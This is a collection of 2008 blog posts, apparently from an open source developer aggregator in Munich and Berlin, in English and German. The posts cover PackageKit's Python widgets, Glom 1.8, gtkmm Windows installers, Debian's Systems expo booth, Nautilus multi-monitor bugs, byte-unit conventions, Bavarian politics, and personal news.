My father has become slightly obsessed with tracking his family tree. He’s done lots of research going back around six generations. He uses a Windows application (called “Generations”, I think, but I’m not sure now), which is very awkward, though he manages.

When his grandson Liam arrived, he wanted to put Liam’s family tree in his system too. Germans tend to have quite good family records, backed up by Church archives, so we had some data.

I exported the result as a GEDCOM file and was really pleased at how well the open source GRAMPS application imported this file on Ubuntu Linux. For some reason I didn’t have high expectations, but this application is obviously well maintained.

And Gramps seems to be a better application anyway. It has a more sensible UI even though it is as feature-packed as these applications needs to be. Gramps also creates more compact ancestor graphs, so you don’t need to tape so many pages together. But it could still theoretically squeeze more on to the page at a readable size. This might already be possible but it’s hard to achieve with the awkward printing options.

Recently I added support for asynchronous operations to the Python client of PackageKit. And on top of this a set of PyGTK widgets which make using PackageKit quite comfortable. The code is part of today's 0.3.10 release.

The following widgets help to visualise the status and progress of a transaction:

* PackageKitStatusIcon
* PackageKitStatusAnimation
* PackageKitStatusLabel
* PackageKitProgressBar
* PackageKitCancelButton - allows to cancel a running transaction
* PackageKitProgressDialog - provides an all-in-one solution of the above widgets
* PackageKitMessageDialog - presents messages and errors from PackageKit

Here you can see a video of the demo application in action. As a prove of concept I replaced the call of Synaptic in gnome-app-install by PackageKit. Here is the corresponding screencast.

The following code snippet installs the package xterm with a graphical progress dialog:

from packagekit.client import PackageKitClient
from packagekit.gtkwidgets import PackageKitProgressDialog
from packagekit.enums import *

def on_exit(trans, exit, runtime):
'''Handle exit state of a transaction e.g. erros or EULAs'''
pass
# Initialize the client
pk = PackageKitClient()
# Get packages which provide xterm
packages = pk.Resolve(FILTER_NONE, "xterm")
# Setup the transaction to install the first package
trans = pk.InstallPackages([packages[0].id], exit_handler=on_exit)
# Initialize the dialog window
dia = PackageKitProgressDialog()
# Connect the transaction to the dialog and run it
dia.set_transaction(trans)
dia.run()

The API is not yet set into stone. So I am open for comments and feedback!

It has always been difficult to find GNOME developers to employ. So for a while I have wanted to grow some new developers of our own. Now that the Berlin office is established we are ready to start by hiring some junior developers.

If you are smart and enthusiastic but you lack experience then we can provide the opportunity. You would work mostly on existing open source projects instead of customer projects, just to get experience with C, C++, GTK+ and Qt. Our developers would provide technical guidance and encourage you to work and communicate in a structured way, creating software that’s actually usable and useful.

This is also a great opportunity to move to Berlin - a wonderful city for young people.

Today I was looking for an alternative to OpenProj, which is used for PM by us, but has some restrictions e.g. in print options.

I thought there should be many different tools to replace Microsoft Project in an adequate manner. Very frustrating, there aren’t I tested nearly 20 tools, some web based, some native clients, even one Windows only software (Open Workbench) running under Wine. But none of them has more than a base set of functions and every tool is not able to create user friendly printoutsof large Gantt diagrams, scaled to one page.

So I think our OpenProj is the best choice for our requirements. …

Derzeit läuft im Deutschen Theater in München noch das Musical “In nomine patris”. Wollte ich unbedingt sehen, die Werbung vorab machte mich neugierig. Und zudem ist Münchens Musicalbühne während des Umbaus ihres Stammsitzes in ein interessantes Zeltkonstrukt am Stadtrand ausgelagert - allein das war schon interessant zu sehen. Dank der Freikarten einer Kollegin (danke Nadine & Steffi) durfte ich dann auch auf den besten Plätzen dem Musicalerlebnis beiwohnen.

War für mein Empfinden guter Durchschnitt, nicht sonderlich schlecht, aber keinesfalls auch nur annähernd in der Reihe der echten Erlebnisse. Aber das ist ja nicht verwerflich, es kann nicht nur Top-Events geben.

Tja, und heute flattert mir eine Werbemail des Deutschen Theaters in den Posteingang:

Wer´s glaubt wird selig!
„… banal, handgreiflich wirkungsbewusst konstruriert (…) für den jeweils billigsten Geschmack…“
(Süddeutsche Zeitung 1961 über die Deutschlandpremiere der „West Side Story“)

„Was für ein Kaiserinnen-Schmarrn“
(Die Presse Wien 1992 über die Uraufführung von „Elisabeth“)

„Himmelschreiender Blödsinn (…) Da hilft nur beten”
(Münchner Merkur 2008 über „In Nomine Patris“)

Auch Kritiker können irren. Viele Stücke, die nach ihren Premieren den Verrissfedern zum Opfer fielen, wurden dennoch große Erfolge. Und wir machen nach wie vor Programm für unser Publikum und nicht für die Kritiker.

“Hier ist eine Panne unterlaufen, allerdings nicht der Eröffnungspremiere oder dem Musical, sondern Frau Dultz; nicht das Stück ist „himmelschreiender Blödsinn“ sondern die Kritik, deren flapsiger Ton alles andere als angemessen ist. …”

Ähm, ja. Geht’s noch? “In nomine patris” auch nur annähernd mit der “West Side Story” zu vergleichen - Blödsinn. Und dann ist natürlich die böse Presse wieder mal schuld.

Bleibt mir nur zu sagen: Amen.

Systems Expo 2008

As the last years, Debian was offered a booth at last week's Systems expo here in Munich again. However, this year the Free Projects area was not organized by Rosa Riebl from C&L publishing, but by Wolfgang Drotschmann from LinuxTag e.V.. This made some things a bit more difficult, e.g. we did not know our exact booth number until a couple of days before the expo and the small conference programme was made up in an ad-hoc fashion after the expo started, but in the end most things worked out fine in some way or the other. While the booth (a demo-point, really) was as big (or rather small) as last year, there was much more space around the booth this year (something which seemed to apply to all of Systems), so things did not get too crowded even when a handful of visitors approached the booth at once. Also, the visibility was much improved as our demo point was visible by strolling visitors this year (last year, our demo point was just facing the wall).

As nobody else stepped up, I had to organize the booth again. Fewer people than last year were around; only Robert Grimm, Arne Wichmann, Franziska Lichtblau, Johannes Wiedersich, Andreas Barth and I were able to commit to staffing the booth; other people were busy over the week or moved away from Munich since last year, like Robert Lemmen or Wolfgang Lonien. Luckily, we still had the computer the GNOME project donated to us last year, and I took a TFT, keyboard and mouse from the university along. This year, I decided to not show up for the booth build-up the day before Systems starts. On the one hand, I had made the experience that there is not much one can do then anyway, and would have to put the computer/TFT into the central locker room overnight anyway. On the other hand, there was as always a very low attendence in the first few hours of the expo so building up the booth in the morning turned out to be no problem. The Credativ people again provided us with merchandise (due to some miscommunication on my part the package had to arrive directly at the expo, but in the end I was glad about this as I had enough trouble carrying the computer and TFT to the expo). This year, thanks to Credativ, we were able to provide some t-shirts for the first time, something quite some visitors had requested over the years. Besides t-shirts, we had some swirl stickers and the popular Debian keychains provided by Joerg Jaspert through Credativ.

In the end the booth mostly consisted of the computer (demonstrating Lenny most of the time) and some A4 sized Swirls I had printed out the day before. From Wednesday on we were able to provide Lenny Beta2 CDs as well thanks to Johannes Wiedersich who organized them. Initially, I asked ADR whether they would produce some CDs for us again as they did last year, but they did not bring the appropriate hardware this time. But thanks to Johannes we were still able to provide interested visitors with CDs through LSK. In the end, we ran out of most t-shirts at some point on Thursday and managed to sell the two remaining Lady shirts on Friday. All the other merchandise was gone by the end of the show as well so the way back was not that difficult, even more so as Andreas Barth helped me carry the computer to the subway and my car.

The days I was at Systems (first and last day) the attendance was rather low, so not that many interesting discussions happened. Almost everybody who stepped by knew Debian already and the majority was using it themselves as well, at least on their servers. Those people were also really quite happy, we rarely heard much critizism, even after asking people for some. The most frequently asked question was undoubtly "when will Lenny release?", followed by "do you have that cool t-shirt in L or XL as well?". Overall it was a pretty good experience, albeit slightly stressful organizing it. In any case, this was probably the last time I had to do this as the Systems organizers announced they will rethink their concept and there will be no Systems 2009.

Every now and then I try to do some more clean up of developer.gnome.org, aiming to move any good content to

library.gnome.org, as docbook in a source code module, so it can be kept up to date by the relevant people, and translated, or
library.gnome.org, as an external link to some other website, or
live.gnome.org, if many non-developers will want to change it often.

It has taken a long time, with lots of emailing, searching, hacking, incredibly quick library.gnome.org help from Frederic Peters, and advice from Shaun McCance, but I have finally reached the point that the main developer.gnome.org page is now just a link to the library.gnome.org developer section and two links to some archived stuff.

There is still stuff in the projects directory, which is only really used by the Usability and Accessibility projects. I don’t think that summary page was ever linked from anywhere. I’d like these to be moved to a new projects.gnome.org subdomain, combining with the www.gnome.org/projects/ stuff that seems to have lots more content. Actually projects.gnome.org exists already, as a bad (no stylesheet) version of the www.gnome.org/projects summary page. Moving all this projects/ stuff into a new svn module would make future changes to www.gnome.org easier.

Then we could kill developer.gnome.org completely. I don’t think anyone has any other plans for it. I don’t even think the archive of old content has any real value, but maybe we could move that to dgo_archive.gnome.org or such suchlike.

I have released Glom 1.8, with many new features and bug fixes. We have not yet fully completed some of the new features, and the refactoring may have introduced regressions that we must fix in 1.8.x releases, but we need to get it all out into the world and move on to Glom 1.10, including porting to libgda-4.0.

We have probably missed the schedule for getting Glom 1.8 into Ubuntu Intrepid so I’ll create some PPA packages when Intrepid is released.

Useful new stuff in Glom 1.8:

Network sharing

As you can see in the new initial dialog, you can now choose to open a Glom system from the network, if a colleague is already running it. This is much easier than getting access to the actual .glom file on a shared network drive.

This uses the new libepc (Easy Publish and Consume) library, developed by Mathias Hasselmann, using avahi and libsoup. There’s a chance we might use telepathy in the future.

Armin implemented the new dialog, and I implemented the load-from-network code using libepc.

Import

You can now import CSV (comma-separated) data in to the current table. The assistant helps you to choose the field mapping, showing you sample data for the first few rows.

Johannes implemented this.

Drag and drop layout

You can now drag items from the toolbar (hidden by default) onto the details layout, and you can drag items within the layout. The automatic layout reflows as you do this.

Yes, we know that the dotted lines are particularly ugly, but I don’t yet know of a better way to show the limits of the columned boxes and items, which may be inside each other. Mockups would be welcome.

Johannes implemented this. It was a huge job and he’s probably glad to be doing some other things now. This uses the EggToolPallette toolbar, developed by Mathias and Jan Arne, that we hope to get into GTK+ eventually.

Print Layout

This is very primitive right now, but you get the idea. Unlike the on-screen layout, this uses precise positioning. That allows you, for instance, to print in the correct places on a pre-printed form.

Most importantly, we need to add some way for fields (particularly lists of related records) to flow into each other, maybe using allowing them to be special objects in text blocks.

I implemented this, if you can call it implemented. I used goocanvas (via the goocanvasmm C++ bindings). I also rewrote the Relationships Overview using goocanvasmm. It also uses the EggToolPallete. I guess we should move it to the left to be consistent with the regular layout toolbar.

Windows Installer

Armin built Glom and its dependencies (apart from Avahi) on Windows and created an experimental installer.

Armin and Johannes also updated Glom’s client-only Maemo build.

What’s next

We need to finish the print layout and drag-and-drop features, and port to libgda-4.0.

I also want add a platform-specific alternative layout option, so one .glom file can have large layouts for regular PCs and small layouts for Maemo, for instance. I’ll probably get around to doing that for 1.10. On Maemo, I also want us to use the new UI elements in Maemo 5, if the Maemo SDK is released.

Interesting, this year’s IT trade fair SYSTEMS, which currently takes place in Munich, is the last after 40 years. The concept will be reorganized and next year there will be two more specialized events in Munich. See the press release.

So it is the last time the “Perspektive Open Source” is active, I think.

I’m looking forward to see what will happen next year

I just copy the text from www.wollmux.org:

The City of Munich is currently looking for new Java developers to support our office migration. One of your main tasks would be working on the improvement of the WollMux.

For more information on all open jobs see
http://www.muenchen.de/stellen

or use the direct link to the Java Developer job offerin.

And we’re also looking for developers in the field of Linux, especially Debian GNU/Linux. For more Information on this topic see this page.

Today the IT trade fair SYSTEMS starts in Munich. If you are interested in the progress of LiMux, the functionality of WollMux or have any other questions please feel free to visit our booth at hall B2.

We share the booth with our cooperation partner, the german Ministry of Foreign Affairs - they are also switching to Open Source.

See you at SYSTEMS (I’ll be there on thursday)

During the next hours I’ll get back from Malaga in Spain, where the OpenSourceWorldConference takes place at the moment.

Yesterday I introduced our WollMux to the interested people at the OSOR sub conference.

Very interesting (for networking reasons) was the spontaneous organized dinner together with nearly 20 people from public administrations in Europe. LiMux is still an interesting project for many of them and the wide range of Open Source and open standards already used throughout Europe shows, that we are not alone

We all agreed that growing this network between the administrations of different member states is a challenge, but will be an enormous success factor. So I hope to see many again at some of the next events (Brussels, …).

Today Jochen and I hold two sessions about the translation process of the German team and Rosetta. Unluckily my session was first and it seems that I draw a too pessimistic picture of Rosetta and the problems it enforces to translators. So Jochen had to a talk in front of a quite small group and did not recieve the attention which his talk should have got. Sorry.

Nevertheless he managed to get a lot of momentum to the team by doing a great job in the last weeks!

You can download Jochens and mine presentation as PDF or as ODP.

So Facebook pretty much missed the German market. There is StudiVZ which has about 10 times as many users in Germany than Facebook has, and which is sometimes called "red facebook" because of the similarities. Then there is "green facebook", Lokalisten, which had started quite regional (and invitation-only), but expanded since, and also is like 2-3 times the size of german Facebook.

So apaprently Facebook now decided they need to compete more in the German market, and started a marketing campaign. As part of this campaign, Mark Zuckerberg, founder and CEO, gave a talk in Berlin and Munich. The marketing company uses a strategy where they try to push these two cities to compete for having the largest fb userbase in Germany.

The talk was okay, I would have wished for more entrepreneural chat; but only a few of the questions were along these lines (e.g.: "when did you know you had something big?"), instead some usual feature requests came up ("Why can't I prevent others from tagging me on photos?")

But the largest kudos I have to give to facebook is for actually finding so many "ambassadors" that will do advertisement for them for free. Well, they got a T-Shirt (that does a word play on "blue" and "taking a day off", although it should probably say "I'm doing free promotion for fb and all I got is this T-Shirt")

It probably only works because Facebook on one hand has always been free, is a "hip web2.0 thing", and they're trying to play "good guys" just like Google does ("don't be evil"). Many people don't understand how despite the privacy functions in Facebook people can still get their data with just some old-style social engineering very easily (so no actual data manipulation or abuse required, but when you do it the right way, just about everybody on facebook will just give you his data voluntarily).

Sometimes all this Web2.0 fanboying can be quite scary, but I figure that is just the way people and societies work.

Catching up a bit (this was like three weeks ago):

The Google Developer Day in Munich in September. Lots of people there (500?). The event was mostly what you'd expect from Google (colors everywhere, geek toys around to play with, ...). Although I had expected that, I still was somewhat disappointed. The talks mostly covered APIs. Some at least showed demos of what is possible with the latest revisions, but some where a bit like "this is how you query the number of views for a YouTube video". For someone who has been using different APIs for years it's just much more convenient to look it up in the online documentation when needed.

But I don't blame Google for that; I think it was what many visitors expected. The reason I actually went there wasn't for the talks, but to talk to Google people, to maybe establish some link between the university and Google (however it seems that Google in Munich mostly does mobile stuff, which is not too relevant for our group).

Jochen Skulj and I are doing an introduction talk to Ubuntu translations and especially the German speaking team at this year's Ubucon which will happen this weekend. See ubucon.de/index.php/programm

Furthermore there will be a translation sprint on Saturday afternoon. This is a great chance if you are interested in the translation, want to become a translator or know of any highly visible bug that we haven't spotted yet.

Am letzten Freitag (10.10.08) haben sich Kathrin und ich das gegenseitige JA-Wort gegeben. Danach ging’s mit der Kutsche durch den Englischen Garten und zur Feier ins Seehaus, wo uns die geladenen Gäste schon erwarteten.

Ein schöner Tag

Installer, documented

For a long time Cedric Gustin provided a popular gtkmm installer for Windows. But he hasn’t had time for that since gtkmm 2.10, so there was no gtkmm 2.12 installer for Windows.

I encouraged others in the community to take over this work, but I eventually asked Armin, one of our Openismus developers, to get it done, with advice from Cedric. He recently blogged about creating that gtkmm 2.14 windows installer. I also asked him to document exactly what it provides, what to distribute with your application, and how the installer was created. See the gtkmm on Windows page, and the Building gtkmm on Windows page.

The installer and the documentation have been through a few iterations of feedback from me and then from the mailing list, so please do tell us if it’s unclear or missing information, or missing something that you need.

Multiple compilers

It looks like we must provide a MS Visual Studio 2008 build as well as a MS Visual Studio 2005 build, so Armin is working on that. Although the compilers are compatible, developers will expect our DLL to link to the new (parallel-installed) version of the MSVC++ runtime libraries, and accidentally linking to both runtime libraries in an application is probably no fun. If we are wrong about that then please do tell us, to save us some work.

I am also concerned that we may need to provide various builds for the various versions of gcc for the MinGW build. Or maybe we should just support the latest one. Unfortunately two users have even reported an incompatibility between g++ 3.4.2 and g++ 3.4.5 in MinGW - they had to upgrade the compiler to catch exceptions from gtkmm when using our DLLs. That shouldn’t be necessary.

For all these various versions, we need to invent DLL naming conventions. But I’d rather take someone else’s conventions. Is there any other C++ library that has an equivalent installer that doesn’t just force you to use one particular compiler? Qt seem to provide only the source code. That’s just enough, but it isn’t very convenient.

Development is so much easier on Linux.

On my parents' small laptop, Windows would just reboot. Even the repair functions of Windows would just reboot. No error message you could read, just reboot, repeat. Linux still worked fine (and my family is fine with using Linux, fortunately).

Linux also allowed us to quickly find out what is wrong with Windows: the hard disk is damaged (I like operating systems that give you useful error messages such as "Unrecoverable Error" on your harddisk). And most likely the laptop is out of warrenty since a month ago, as usual.

So I'm now investigating if the Linux partition also contains hardware errors, or if we might get away with just disabling Windows altogether for some time, until I get around to buy a replacement harddisk (and a replacement battery, too). So far, our experiences with Medion/Aldi/Tchibo have been rather bad. The TFT screen for the main computer is often flickering, but they failed to repair it in two attempts now. The MP3-CD-Player had stopped reading and the replacement didn't play MP3 at all. And the laptops batteries were crap (and why did they put in two small batterys instead of a reasonably sized one?), I know of a friend where the CD drive of that same model doesn't work anymore, and now our harddisk is dead with just some 11 days of use total (it was meant to be a portable system, and my parents have better computers for daily use at home).

If we buy a replacement, it will most likely be a so called "Netbook" with Linux preinstalled. These tiny systems often come preinstalled with Linux (because a Windows licence would increase the price by like 50%) and would fit our requirements pretty well. Not sure which one, though. Maybe an EEE.

The APT backend for PackageKit has made a lot of progress recently in the 0.3.x series. It nearly supports all features of PackageKit.

Highlights of the 0.3.x series are:

Search for codecs and mime type handlers
Local file installation
Change log for updates
Group support
Repository handling
Notification of new distro releases
A lot of bug fixes

See the feature matrix for more infromation.

Currently we have got a quite outdated 0.2.4 version in Intrepid. Furthermore sharing the same version would help to reduce maintenance burden, since Fedora plans to ship 0.3.2 in the next release. But before proposing a freeze exception I would like to have some feedback.

So if you are interested in this piece of software and want to push packagekit forward please test it on your system and report bugs that you may encounter.

You can find packages of the upcoming 0.3.2 release for Hardy and Intrepid in this Personal Package Archive. Add the repository and install the packages packagekit and packagekit-gnome.

The new applications will appear in the System->Administration menu.

Update: I uploaded packages to the PPA which fix a problem with PolicyKit. Furthermore I fixed the reference to packagekit-gnome package above.

Update: I just upgraded the packages to 0.3.5 and filled a new freeze exception:

https://bugs.launchpad.net/ubuntu/+source/packagekit/+bug/276264

I read up on the history of the ancient convention that 1024 Bytes are called 1 Kilobyte. The problem with the convention is that it’s totally unintuitive unless you know it.

Unfortunately, Microsoft decided to use the following conventions and now the whole world uses it:

1 KB = 1024 Bytes
1 MB = 1024 * 1024 Bytes
1 GB = 1024 * 1024 * 1024 Bytes.

Basically, that is a mish-mash of the ancient 70s convention of using kB for 1000 Bytes and KB for 1024 Bytes, and an abuse of the SI definitions of M and G prefixes. Actually, there is no mB or gB convention, although that would have been logic in the original convention. This is due to the fact that in the 70s - the age of large and expensive computers -, nobody believed that mass storage would actually be achievable at all.

Just assume you never used a computer, ancient UNIX tools or listened to a computer science lecture, or were taught anything about computers. Wouldn’t you expect that

1 KB = 1000 Bytes
1 MB = 1000 * 1000 Bytes
1 GB = 1000 * 1000 * 1000 Bytes?

I filed a bug report against glib, with an historical analysis of the usage of all conventions and formalized nomenclatures in existence (slightly wrong) demanding that g_format_size_for_display() uses the latter conventions. This actually matches IEC recommendations.

One important side-effect of the conventions are:

K=1000: Memory sticks and main memory cells are made in powers-of-two - because the address line uses binary logic (i.e. powers-of-two). Historically, their size is advertized with K=1024 to get nice, non-fractional values. Below the 1 GB limit, they were probably advertized with kB rather than KB - but that shouldn’t be relevant anymore. With K=1000, on your computer screen memory (and memory sticks) shows up LARGER than advertized.
K=1024: Hard disks do not have such cell architectures, and they are advertized with K=1000. It was some kind of marketing trick in the very beginning, making the disk look larger than you expect, when you set K=1024 as old-fashioned “IT geek”. The effect is that with K=1024, on your computer screen hard disks look SMALLER than advertized.

Compare for yourself: Which of the two statements is positive, psychologically:

In contrast to Windows, under Linux my 70 GB hard disk has 70 GB as advertized, and my 1 GB memory sticks grow to 1,07 GB
Like under Windows, under Linux my 70 GB hard disk shrinks to 65,1 GB and my 1 GB memory sticks have 1 GB as advertized

Wouldn’t it also be nice to have a 100 MB file with 100 * 1000 Kilobytes? No more calculator I/O or right-clicking required for estimating the “actual” size in byte units!

I am mostly writing this blog entry to get some feedback from our users, rather than from programmers. Please also mention your background in your blog comments! Further concrete information regarding historic conventions and IEC and SI standards is available in the bug report mentioned above.

Also note that I do NOT demand to use the additional odd KiBi, MiBi, GiBi IEC convention that in fact make the current situation worse by using prefixes nobody knows, still defining Ki = 1024. My guess is that it was just introduced for offering an alternative for traditionalists who probably wanted “some convention with the beloved 1024”. But it is a non-traditional measurement prefix for a traditional concept, which makes it unattractive both for old(-fashioned) traditionalists and young pragmatists.

Update

I removed the possibly intimidating roundhouse kicks against IT community, and somewhat out-of-context IRC log excerpts. Sorry if anybody felt insulted - some certainly did. You can find an interesting collection of opinions and personal backgrounds in the blog comments.

Ich kann meinen Landsleuten an dieser Stelle nur gratulieren, sofern sich die Hochrechnungen einigermaßen bewahrheiten (man denke nur an die legendäre “wir haben die Wahl gewonnen”-Rede von Eddi).

Als letztes deutsches Bundesland hat Bayern heute, immerhin fast 19 Jahre nach dem Fall der Mauer, die “Diktatur” einer Partei abgeschafft.

Zeit wurde es und Demokratie funktioniert anscheinend doch noch!

Und der stärksten Kraft im Landtag gratuliere ich auch zu 40+x

Eine Demokratie ist krank, wenn es eine absolute Mehrheit gibt. Eine gesunde Demokratie hat mehrere starke Parteien und schwache Parteien (ohne übermäßig zu zersplittern), die nur zusammen eine Regierung bilden können. Nur so ist ein Pluralismus gewährleistet, und dass der Normalbürger mit seinem Wahlverhalten noch Einfluss üben kann, und nicht die "Parteioberen" alleine entscheiden was passiert.

Sein Wahlverhalten sollte man an diese Situation anpassen, und mit beispielsweise den Freien Wählern steht ja inzwischen eine sehr ähnlich orientierte Partei flächendeckend als Alternative zur Union zu verfügung. Wer etwas offener für neue Ansätze und Reformen ist, der ist aber nach wie vor besser bei den Grünen aufgehoben.

Kleine Parteien wie die ÖDP - so sympathisch sie auch sein mögen - werden bei dieser Wahl vermutlich keine Chance haben, diesen eine Stimme zu geben ist eher kontraproduktiv, und erreicht eigentlich nur das nominelle Ergebniss der anderen Parteien zu reduzieren und die Wahlbeteiligung zu verbessern. Solange aber eine andere Partei nicht gerade eben unter die 5 %-Marke rutscht ändert sich nichts am Ergebnis (d.h. das wäre eine Stimme für "Hauptsache nicht Die Linke")

Für die Demokratie in Bayern wäre ein Ergebnis wie CSU 40%, SPD 20%, Grüne 12%, Freie Wähler 11%, FDP 10%, Sonstige zusammen 7% ganz realistisch und wünschenswert.

Dazu brächten wir nur ein paar mehr Wähler für die kleinen Parteien. Sucht euch eine aus, es ist für jeden etwas dabei!

[Disclaimer: Ich bin Mitglied bei den Grünen in Bayern.]

As of today, Openismus welcomes Daniel Borgmann, of Clearlooks and UbuntuLooks theme/theme-engine fame. But his office in Berlin must remain empty for at least three months because we are sending him north to Helsinki. He’ll experience the dark frozen winter, which is probably quite interesting when you know you will come home eventually.

Daniel will be working on theming for the new Maemo platform. We brought him to the Maemo summit in Berlin at the weekend and I hope that was a positive introduction to Maemo.

I retired from the German Ubuntu translation team. I already stopped translating some time ago and it was getting harder and harder for me to find the motivation and time to work on the coordnation of the team. So it was time for a clear cut.

The troubles of an Ubuntu translator are well known and documented, so I won't complain here again.

Thanks to all the translators and the Rosetta developers. who are not always in a nice position.

I am still open to technical questions and will be at the Ubucon, the German Ubuntu Users Conference, in Götting from 17th to 19th October.

Maemo Summit

The Maemo summit in Berlin was much better than expected, though mostly for the meetings outside of the talks, where the NDAed people could whisper obscurely to other NDAed people. Many thanks to the summit organizers, to Nokia, and to C-Base.

Nokia announced some big hints about the next version of Maemo, including a major focus on finger and thumb usage rather than a stylus, better CPU and graphics, and the (unspecified) use of the clutter toolkit. For us NDAed people it took extra effort to remember what stuff was now public and what stuff was secret. To ease that problem, and to get valuable feedback, it looks like there will be early SDK releases with ongoing public work in svn, but I will believe that when I see it. I want to believe.

Listeners to Rodrigo Novo’s charming accent could be forgiven for hearing that it would be a tongeable interface rather than a thumbable interface. Maemo 5 will be great, but that’s an exaggeration.

Openismus Party

We hosted a party on the last evening of the Maemo summit, in our beautiful new offices, with Maemo/Nokia sponsoring the drinks and pizza. The numbers of people were just right, and the atmosphere was very positive and friendly. I saw many of my favorite people and met some new favorites too. People seemed to enjoy the place.

I took a few quick shots with my narrow-angle low-light lens, but the results are kind of abstract and fuzzy.

Apparently an upstairs neighbour poured a bucket of water on Philip Van Hoof, possibly annoyed at the noise at 11 o’clock. But I think that’s too early to be plausible, so it must be someone who doesn’t know that Philip is much nicer in person than online. Philip took it with good humor.

Jetzt sind langsam wieder alle da, die bayrischen Sommerferien enden heute. Nichtsdestotrotz liefen die Planungen weiter und ab dem morgigen Montag beginnt die Herbsttour.

Zunächst steht am 16.9.08 in Leipzig ein Treffen mit Vertretern des Sächsischen Landkreistages auf der Mittelstandsmesse Komkom an. Gerade in den neuen Bundesländern ist freie Software zuletzt immer öfter ein Thema, das Interesse seit Jahren auffällig groß.

Als nächstes wird das Open Source Observatory and Repository der EU Kommission (OSOR) auch offiziell eröffnet. Das findet im Rahmen der OpenSourceWorldConference in Malaga am 20.10.08 statt - und wir sind mit unserem WollMux als Gründungsmitglied natürlich vertreten. Derzeit läuft auch noch eine Anfrage, ob wir im allgemeinen Teil der imho überwiegend von Spaniern besuchten Konferenz über LiMux an sich informieren möchten… mal schauen ob’s was wird.

Direkt danach beginnt in München vom 21.10. bis 24.10.08 die SYSTEMS und diesmal ist LiMux sogar an zwei Ständen im Themenpark Perspektive Open Source vertreten. Einmal zusammen mit dem Auswärtigen Amt (dazu später mal mehr) und dann noch genau gegenüber zusammen mit unserem für Personal- und Organisation zuständigen Bereich. Nachdem München seit Monaten immerwieder gute Jobs im IT-Bereich an ganz unterschiedlichen Stellen bietet, möchten wir gemeinsam die attraktive IT-Arbeitgeberin “Stadtverwaltung München” darstellen.

Und zu guter Letzt noch ein kleines Schmankerl: auf Einladung der OpenOffice.org Community präsentiere und diskutiere ich unser Projekt auf der diesjährigen OpenOffice.org Conference vom 5. bis 7.11.08 in Peking. Dazu sicher später mehr.

I have been in Berlin since Monday, setting up everything in the new office to be ready for the party this evening. We built lots of IKEA furniture, we have wireless internet, we have a fancy coffee machine, music, a Wii games room, several crates of beer, and a source of regular pizza. It’s still a little primitive.

The party starts at 8pm. We will probably shut things down at midnight, to avoid annoying the neighbors. But we are in a wonderful neighborhood with an insane amount of cafes and bars, so you’ll have no problem partying on until the morning. I am a little worried that we’ll have 200 people there, instead of the planned 80. Let’s see.

We are at Kastanienallee 88. To get there from the Maemo summit, take the U2 U-Bahn to Eberswald Strasse from Märkisches Museum, or take the S-Bahn from Janowitzbrucke and switch to the U2. Alternatively, take the M1 tram and get off at Schwedter Strasse. See Google Maps.

Today I tried out Nautilus with dual-head, i.e. two monitors that share a large virtual screen using XRandr. It was a desaster! Not XRandr - I love it! But it turns out that Nautilus miserably fails to be useful in a dual-head layout.

I already fixed Nautilus 2.24 to never move any icons outside the (virtual) screen area some time ago, but for dual-head we have horrible issues:

* Dead space is not detected, icons are put happily there

* The icons are not laid out per physical monitor, but per virtual screen. You can easily have icons that are “shared” between two monitors. While the actual icon layout is a bit tricky in the case of overlapping monitor regions, in the non-overlapping case we should perfectly be able to do nice per-monitor icon layouts.

* When there is a loading error for a file launched from the desktop, it is displayed in the middle of the (virtual) screen, and not in the middle of the monitor you used to open the location.

* The first navigation window is always opened on the monitor where the last navigation window was closed, even when you open it through the panel on a different monitor (patch pending release team approval).

* We don’t begin the icon layout on the monitor that you right-click to select “clean up by name”

* No background image awareness, i.e. the background image is just centered across monitors, even if it fits on the first monitor. Ideally, we’d have per-monitor backgrounds, of course.

* … any more issues you report, assuming you actually use GNOME in a dual monitor setup …

Now, a serious question: Is our user base so small, that we just receive bug reports evry once in a while, and not constantly? Are our users masochistic or unprofessional enough to tolerate this in a desktop environment that is supposed to be used in business environments?

While I frequently use beamers in combination with my laptop, I miserably failed to use them with Linux and used Windows for my (university) beamer needs from day two on. An educated guess is that almost every GNOME user out there does the same and uses Linux for non-serious business only. This is somewhat frustrating, as we are still trying to deliver a robust and business grade desktop environment - aren’t we? Note that this is NOT a rant about XRandr, which is really, really neat. It’s just we who suck!

Update

Some comments suggest that some of our users feel insulted, and rectify themselves that they actually filed bugs, gave up on us or something along those lines. It is interesting how some people describe their use-cases, griefs and work-arounds. I love how everybody cares about quality, files bug reports and kicks us in the arse when things are broken. I certainly did not write this to insult anybody. You have to understand that I somehow feel like an innkeeper who thinks that he has some good wine in his cellar, realizing that half his wine from a certain country is decomposed.

Mal wieder typisch, die kleinen Wahl-Fast-Lügen der Parteien.

z.B. die CSU, die "verspricht" in Bildung und Forschung zu investieren.

Nur dass das überhaupt nicht der CSU-Politik entspricht:

Statt ein Studium attraktiver zu machen wurden Studiengebühren eingeführt und Mittel gekürzt. Und das obwohl wir vor einem enormen Defizit an Hochqualifizierten Arbeitskräften stehen!

Dann währe da noch die Schulreform, bekannt als G8. Statt hier in den dringend benötigten technischen Fächern wie Physik auszubauen wird dort gekürzt, einiges gar zu "ferner liefen" degradiert. Nicht sehr zukunftsträchtig für das Ingenieursland Deutschland.

Der Trick der CSU ist ganz einfach:

Sie versprechen über 1000 neue Stellen - mit dem Wissen dass sie diese nicht besetzen können. So kann man leicht "investieren", ohne das Geld konkret ausgeben zu müssen.

Angeblich hat das Kultusministerium schon jetzt Finanzmittel eingeplant für 2000 neue Lehrerstellen, es gibt nur keine Lehrer um diese Stellen zu besetzen. Und nach Berechnungen der Grünen wurden übrigens seit 2004 über 320 Lehrer-Stellen gestrichen.

Update: ich habe noch einen Trick der CSU gelernt: die Stellen sind alle befristet auf 1 Jahr. Dadurch kann man jedes Jahr wieder 1000 "neue" Lehrer einstellen ... ohne dass sich wirklich irgend etwas ändert, außer dem Verwaltungsaufwand und dass es halt technisch gesehen keine "Lüge" ist.

If you are working with Eclipse on a Java project, make sure to try a regular (ant) build from time to time. The eclipse compiler sometimes differs quite a lot in what it accepts (especially when it comes to generics it seems to be a bit more clever) or considers a warning.

No, I did not just disable a warning. Eclipse did report some "serialVersionUID" warnings, but it missed lots of them, too. I have the vague impression that the Eclipse java compiler didn't recognize that a class implementing the "Externalizable" interface also should have a serial version UID.

And unfortunately I didn't find a way to reach the serial UID generation quickfix without having an eclipse warning... Well, after all there is not much wrong with starting the serial version at 1L.

Due to their implementation by erasure, they face certain limitations.

For example, the following constructor for a class with both compile time and runtime type checking:

class BagOf<T> {
  BagOf(Class<T> restrictionClass);
}

